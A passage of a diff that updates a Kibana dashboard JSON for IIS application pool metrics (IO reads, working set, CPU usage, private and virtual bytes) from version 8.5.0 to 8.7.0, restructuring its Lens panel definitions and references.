"params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "gridData": { - "h": 15, - "i": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", - "w": 24, - "x": 24, - "y": 11 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", - "title": "IO Read Operations", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "IO Read Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "50b288bd-2146-4adf-9afa-85b2b3ee21be", + "w": 24, + "x": 0, + "y": 26 + }, + "panelIndex": "50b288bd-2146-4adf-9afa-85b2b3ee21be", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Working Set", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Working Set", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.working_set" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.working_set" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "50b288bd-2146-4adf-9afa-85b2b3ee21be", - "w": 24, - "x": 0, - "y": 26 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "50b288bd-2146-4adf-9afa-85b2b3ee21be", - "title": "Working Set", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Working Set" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", + "w": 24, + "x": 24, + "y": 26 + }, + "panelIndex": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.cpu_usage_perc" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.cpu_usage_perc" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "gridData": { - "h": 15, - "i": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", - "w": 24, - "x": 24, - "y": 26 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8", - "title": "CPU Usage", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "cfb96343-c92d-425c-b36c-5153bd4b05e8", + "w": 24, + "x": 0, + "y": 41 + }, + "panelIndex": "cfb96343-c92d-425c-b36c-5153bd4b05e8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Private Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Private Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.private_bytes" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.private_bytes" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "cfb96343-c92d-425c-b36c-5153bd4b05e8", - "w": 24, - "x": 0, - "y": 41 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "cfb96343-c92d-425c-b36c-5153bd4b05e8", - "title": "Private Bytes", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Private Bytes" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "941273c3-2e8f-4b44-9701-a52fb0f2e221", + "w": 24, + "x": 24, + "y": 41 + }, + "panelIndex": "941273c3-2e8f-4b44-9701-a52fb0f2e221", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.virtual_bytes" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.virtual_bytes" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "941273c3-2e8f-4b44-9701-a52fb0f2e221", - "w": 24, - "x": 24, - "y": 41 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "941273c3-2e8f-4b44-9701-a52fb0f2e221", - "title": "Virtual Bytes", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Application Pool Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-b4108810-861c-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5:indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "25c69234-9c74-4179-87f7-3be8a18e4cd9:indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50b288bd-2146-4adf-9afa-85b2b3ee21be:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfb96343-c92d-425c-b36c-5153bd4b05e8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "941273c3-2e8f-4b44-9701-a52fb0f2e221:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_44559996-134f-4279-8705-0da162d57dc9:optionsListDataView", - "type": "index-pattern" - } + "title": "Virtual Bytes" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Application Pool Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5:indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "25c69234-9c74-4179-87f7-3be8a18e4cd9:indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50b288bd-2146-4adf-9afa-85b2b3ee21be:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b76b8a0e-e0fc-4095-bc82-0fa429e28ee8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cfb96343-c92d-425c-b36c-5153bd4b05e8:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "941273c3-2e8f-4b44-9701-a52fb0f2e221:indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_44559996-134f-4279-8705-0da162d57dc9:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git 